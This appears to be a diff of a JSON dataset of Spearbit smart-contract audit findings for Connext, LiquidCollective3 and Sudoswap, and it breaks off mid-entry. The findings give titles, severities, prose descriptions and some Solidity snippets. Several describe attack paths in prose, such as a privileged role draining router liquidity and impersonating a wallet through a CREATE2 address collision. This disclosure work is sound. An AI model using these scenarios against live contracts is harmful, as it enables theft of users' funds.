+ "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Incorrect Natspec for adopted and canonical asset mappings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "adoptedToCanonical maps adopted assets to canonical assets, but is described as a \"Mapping of canonical to adopted assets\"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a \"Mapping of adopted to canonical assets\". // /** // * @notice Mapping of canonical to adopted assets on this domain // * @dev If the adopted asset is the native asset, the keyed address will // * be the wrapped asset address // */ // 12 mapping(address => TokenId) adoptedToCanonical; // /** // * @notice Mapping of adopted to canonical on this domain // * @dev If the adopted asset is the native asset, the stored address will be the // * wrapped asset address // */ // 13 mapping(bytes32 => address) canonicalToAdopted;", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Use of SafeMath for solc >= 0.8", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "AmplificationUtils, SwapUtils, ConnextPriceOracle, GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in solidity reverts if it overflows or underflows, hence there is no need to use open- zeppelins SafeMath library.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "_pickNextValidatorsToExitFromActiveOperators uses the wrong index to query stopped validator count for operators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "operators does not necessarily have the same order as the actual OperatorsV2's operators, since the ones that don't have _hasExitableKeys will be skipped (the operator might not be active or all of its funded keys might have been requested to exit). And so when querying the stopped validator counts for (uint256 idx = 0; idx < exitableOperatorCount;) { uint32 currentRequestedExits = operators[idx].requestedExits; uint32 currentStoppedCount = _getStoppedValidatorsCountFromRawArray(stoppedValidators, idx); one should not use the idx in the cached operator's array, but the cached index of this array element, as the indexes of stoppedValidators correspond to the actual stored operator's array in storage. Note that when emitting the UpdatedRequestedValidatorExitsUponStopped event, the correct index has been used.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Critical Risk" + ] + }, + { + "title": "Oracles' reports votes are not stored in storage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of Oracle.1.sol is to facilitate the reporting and quorum of oracles. Oracles period- ically add their reports and when consensus is reached the setConsensusLayerData function (which is a critical component of the system) is called. However, there is an issue with the current implementation as ReportVari- ants holds the reports made by oracles but ReportVariants.get() returns a memory array instead of a storage array, therefore resulting in an increase in votes that will not be stored at the end of the transaction and prevent- ing setConsensusLayerData from being called. This is a regression bug that should have been detected by a comprehensive test suite.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Critical Risk" + ] + }, + { + "title": "User's LsETH might be locked due to out-of-gas error during recursive calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Let W0, W1, ...W7 represent the withdrawal events in the withdrawal stack. Let R0, R1, R2 represent the users' redeem requests in the redeem queue. Assume that Alice is the owner of R1. When Alice called the resolveRedeemRequests function against R1, it will resolve to W 1. Next, Alice called the _claimRedeemRequest function with R1 and its corresponding W 1. The _claimRedeemRequest will first process W 1. At the end of the function, it will check if W 1 matches all the amounts of R1. If not, it will call the _claimRedeemRequest function recursively with the same request id (R1) but increment the withdrawal event id (W2 = W1 + 1). The _claimRedeemRequest function recursively calls itself until all the amount of redeem request is \"expended\" or the next withdrawal event does not exist. In the above example, the _claimRedeemRequest will be called 7 times with W1...W7, until all the amount of R1 is \"expended\" (R1.amount == 0) However, if the amount of a redeem request is large (e.g. 1000 LsETH), and this redeem request is satisfied by many small chunks of withdrawal events (e.g. one withdrawal event consists of less than 10 LsETH), then the recursion depth will be large. The function will keep calling itself recursively until an out-of-gas error happens. If this happens, there is no way to claim the redemption request, and the user's LsETH will be locked. In the current implementation, users cannot break the claim into smaller chunks to overcome the gas limit. In the above example, if Alice attempts to break the claim into smaller chunks by first calling the _claimRedeemRequest function with R1 and its corresponding W5, the _isMatch function within it will revert.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: High Risk" + ] + }, + { + "title": "Allowed users can directly transfer their share to RedeemManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "An allowed user can directly transfer its shares to the RedeemManager without requesting a redeem. This would cause the withdrawal stack to grow, since the redeem demand (2) which is calculated based on the RedeemManager's share of LsETH increases. RedeemQueue would be untouched in this case. In case of an accidental mistake by a user, the locked shares can only be retrieved by a protocol update.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "Invariants are not enforced for stopped validator counts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "_setStoppedValidatorCounts does not enforce the following invariants: stoppedValidatorCounts[0] <= DepositedValidatorCount.get() stoppedValidatorCounts[i] needs to be a non-decreasing function when viewed on a timeline stoppedValidatorCounts[i] needs to be less than or equal to the funded number of validators for the corresponding operator. Currently, the oracle members can report values that would break these invariants. As a consequence, the oracle members can signal the operators to exit more or fewer validators by manipulating the preExitingBalance value. And activeCount for exiting validators picking algorithm can also be manipulated per operator.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "Potential out of gas exceptions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The purpose of _requestExitsBasedOnRedeemDemandAfterRebalancings is to release liquidity for withdrawals made in the RedeemManager contract. The function prioritizes liquidity sources, starting with Balance- ToRedeem and then BalanceToDeposit, before asking validators to exit. However, if the validators are needed to release more liquidity, the function uses pickNextValidatorsToExit to determine which validators to ask to exit. This process can be quite gas-intensive, especially if the number of validators is large. The gas consumption of this function depends on several factors, including exitableOperatorCount, stoppedVal- idators.length, and the rate of decrease of _count. These factors may increase over time, and the msg.sender does not have control over them. The function includes two nested loops that contribute to the overall gas con- sumption, and this can be problematic for certain inputs. For example, if the operators array has no duplications and the difference between values is exactly 1, such as [n, n-1, n-2 ... n-k] where n can be any number and k is a large number equals exitableOperatorCount - 1 and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas intensive. If the number of de- sired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The validatorCountToExit is calculated as follows uint256 validatorCountToExit = LibUint256.ceil( redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance), DEPOSIT_SIZE ); This formula assumes that the to-be selected validators exit by the pickNextValidatorsToExit are: 1. Still active 2. Have not been queued to be exited and 3. Have not been penalized and their balance is at least MAX_EFFECTIVE_BALANCE", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Burn RedeemManager's share first before calling its reportWithdraw endpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "reportWithdraw and then burns the corresponding shares for the RedeemManager The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Currently, it is possible for the oracle to report on the same epoch multiple times, because _- isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior The code will revert if the report increases the balance, not with an explicit check but reverting due to a subtraction underflow, since maxIncrease == 0 and Allowing other code paths to execute to completion.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Missing event emit when user calls deposit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit, but when a user calls UserDepositManager.deposit, the event is never emitted which could break tooling.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made then resets the report variant and position data and also it increment the last epoch id afterward // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } In the future version of the protocol there might be a possibility for an oracle member to call back into reportCon- sensusLayerData when river.setConsensusLayerData(report) is called and so it would open a reentrancy for compromised/malicious oracle members.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend);", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Any oracle member can censor almost quorum report variants by resetting its address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "/// @notice Retrieve all the active and fundable operators /// @dev This method will return a memory array of length equal to the number of operator, but /// @dev populated up to the fundable operator count, also returned by the method /// @return The list of active and fundable operators /// @return The count of active and fundable operators function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { // uint32[] storage stoppedValidatorCounts = getStoppedValidators(); for (uint256 idx = 0; idx < operatorCount;) { _hasFundableKeys(r.value[idx]) && _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits only @audit-ok File: Operators.2.sol 153: 154: ,! 155: 156: 157: 158: ,! ..SNIP.. 172: 173: 174: 175: 176: 177: ,! 178: if ( ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function is a value reported by oracle members which consist of both exited and slashed validator counts It was understood the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to re- In other words, an operator with a re- spond quickly to exit requests if they want new stakes from deposits. questedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that an operator did not submit exit requests to the Consensus Layer (CL) in a timely manner or the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario: Assuming an operator called A has 5 slashed validators and 0 exited validators, the _getStoppedValidator- CountAtIndex function will return 5 for A since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. In this case, the incentive mechanism seems to diminish as A will still be considered a fundable operator even if A does not respond to exit requests since the number of slashed validators is enough to \"help\" to push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "RedeemManager. _claimRedeemRequests transaction sender might be tricked to pay more eth in trans- action fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y. The following points are extracted from the Withdrawals Smart Contract Architecture documentation: The design ensures that x <= y . Refer to page 15 of the documentation. It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation. Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y ) is not being enforced in the contract. The reporter could continue to report withdrawal via the RedeemManager.reportWithdraw function till the point x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advan- tage.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "IERC1155 not utilized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPair references IERC1155, but does not utilitze the interface within LSSVMPair.sol. import {IERC1155} from \"@openzeppelin/contracts/token/ERC1155/IERC1155.sol\"; The struct TokenToTokenTrade is dened in LSSVMRouter, but the contract does not utilize the interface either. struct TokenToTokenTrade { PairSwapSpecific[] tokenToNFTTrades; PairSwapSpecific[] nftToTokenTrades; } It is better to remove unused code due to potential confusion.", + "title": "An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is (cid:1)e, an oracle member will be able to call reportConsensusLayerData (cid:1)e + 1 times to push its report for epoch e to the protocol and with different data each time (only restriction on successive reports is that the difference of underlying balance between reports would need to be negative since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to quorum of one: x = LastEpochId -> report.epoch -> x + 1", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "Use Fractions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "In some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read. 43 LSSVMPairFactory.sol#L28 LSSVMPair.sol#L25", + "title": "Report's validatorsCount's historical non-decreseness does not get checked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in the storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on consensus layer (even if they have been slashed or exited at some point ). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant has never been checked in setConsensusLayerData.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "Two families of token libraries used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The Sudoswap contract imports token libraries from both Open- Zeppelin and Solmate. If Sudoswap sticks within one library family, then it will not be necessary to track potential issues from two separate families of libraries.", + "title": "The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle mem- bers which affects the exiting strategy of validators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current protocol leaves it up to the oracle members to come to a quorum to set either of the report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (vs an algorithmic decision by the protocol on-chain). A potential bad scenario would be oracle members deciding to not signal for new validators to exit and from the time for the current epoch to the next report some validators get penalized or slashed which would reduce the If those validators would have exited before getting slashed or penalized, the underlying value of the shares. redeemers would have received more ETH back for their investment.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "swapInternal() shouldn't use msg.sender", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "As reported by the Connext team, the internal stable swap checks if msg.sender has sufficient funds on execute(). This msg.sender is the relayer which normally wouldn't have these funds so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function _handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(... ) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), \"more than you own\"); ... } // msg.sender is the relayer", + "title": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not-funded yet but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Then anyone can front run the removal call by the operator and force push this validator's info to the deposit contract.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "MERKLE.insert does not return the updated tree leaf count", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true. If the updated count is 2k (2n + 1) where k , n 2 N [ 0 then the return value would be 2n + 1. Currently, the returned value of insert is not being used, otherwise, this could be a bigger issue.", + "title": "Calculation of currentMaxCommittableAmount can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxCommittableAmount is calculated as: // we adapt the value for the reporting period by using the asset balance as upper bound uint256 underlyingAssetBalance = _assetBalance(); uint256 currentBalanceToDeposit = BalanceToDeposit.get(); ... uint256 currentMaxCommittableAmount = LibUint256.min( LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days), currentBalanceToDeposit ); But underlyingAssetBalance is Bu = Bv +Bd +Bc +Br +32(Cd (cid:0)Cr ) which is greater than currentBalanceToDeposit Bd since the other components are non-negative values. parameter description Bv Bd Bc Br Cd Cr M m Bu LastConsensusLayerReport.get().validatorsBalance BalanceToDeposit.get() CommittedBalance.get() BalanceToRedeem.get() DepositedValidatorCount.get() LastConsensusLayerReport.get().validatorsCount currentMaxCommittableAmount currentMaxDailyCommittableAmount * period) / 1 days underlyingAssetBalance Note that the fact that Cd (cid:21) Cr is an invariant that is enforced by the protocol. and so currently we are computing M as: M = min(Bu, Bd , m) = min(Bd , m) since Bu (cid:21) Bd .", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets de- ployed and its constructor is called, if _mirrorConnector == address(0) then setting the mirrorConnector stor- age variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now since the setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by it and assign their own fxRootTunnel PolygonSpokeConnector (PolygonHubConnector) anyone can call (fxChildTunnel) address (note, fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel Note that (fxChildTunnel) to be set once (non-zero address value) so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMir- rorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector) the following will try to execute: 9 // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert since fxRootTunnel (fxChildTunnel) is already set. Thus if the owner of PolygonSpokeConnec- tor (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing the setMirrorConnector and setFxRootTunnel (fxChildTunnel) endpoints for the owner. PolygonSpokeConnector's", + "title": "Remove redundant array length check and variable to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextVal- idators. This is unnecessary as the code always creates them with the same length.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "A malicious owner or user with a Role.Router role can drain a router's liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A malicious owner or user with Role.Router Role denominated as A in this example, can drain a router's liquidity for a current router (a router that has already been added to the system and might potentially have added big liquidities to some assets). Here is how A can do it (can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens that the router has liquidity and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this connext instance) and any user who has a Role.Router Role with their liquidity. So the setup is not trustless currently.", + "title": "Duplicated events emitted in River and RedeemManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both RedeemManager and River contracts.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "Users are forced to accept any slippage on the destination chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The documentation mentioned that there is cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If the high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate. Otherwise, their funds will be stuck in Connext.", + "title": "totalRequestedExitsValue's calculation can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "In the for loop in this context, totalRequestedExitsValue is updated for every operator that sat- isfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount. Based on the used increments, their sum equals to optimalTotalDispatchCount.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "Preservation of msg.sender in ZkSync could break certain trust assumption", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), this is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts as the same account/wallet address might be owned by different persons on different chains. This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs. For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2 which allows users to define its salt when deploying the wallet, Bob might use ABC as salt in Ethereum and Alice might use ABC as salt in Zksync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute Hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on ZkSync chain. Alice performs a xcall from Ethereum to ZkSync with delegate set to 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. 11 Bob (attacker) saw that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of the 0xABC by interacting with the wallet factory to deploy a smart contract wallet on the same address on Ethereum. Bob can do so by checking out the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make a L1 -> L2 request by calling the ZKSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is only specific to ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests.", + "title": "Report's bufferRebalancingMode and slashingContainmentMode are only used during the reporting transaction process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "report.bufferRebalancingMode and report.slashingContainmentMode are only used during the transaction and their previous values are not used in the protocol. They can be removed from being added to the stored report. Note that their historical values can be queried by listening to the ProcessedConsensusLayerReport(report, vars.trace) events.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "No way to update a Stable Swap once assigned to a key", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for token), it cannot be updated nor deleted. A Swap can be hacked or an improved version may be released which will warrant updating the Swap for a key.", + "title": "Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as /// @notice The format of the oracle report struct ConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; uint32[] stoppedValidatorCountPerOperator; bool bufferRebalancingMode; bool slashingContainmentMode; } /// @notice The format of the oracle report in storage struct StoredConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; bool bufferRebalancingMode; bool slashingContainmentMode; } Comments regarding their specified fields are lacking.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Renouncing ownership or admin role could affect the normal operation of Connext", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Instance 1 - Renouncing ownership All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called 